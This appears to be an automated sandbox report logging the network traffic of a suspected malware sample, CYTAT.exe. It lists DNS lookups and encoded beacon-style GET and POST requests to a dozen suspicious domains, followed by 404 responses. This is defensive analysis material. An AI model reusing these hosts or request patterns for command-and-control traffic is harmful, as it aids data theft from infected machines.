            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?7lpPGx=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?7lpPGx=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL3dlYbix0Oof31N0WjWMIZqIkiGsjqX+LyUecOwrV8dky8MLclvmAsWX&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 219Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 37 6c 70 50 47 78 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d Data Ascii: 7lpPGx=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:30 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:32 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:35 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:37 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
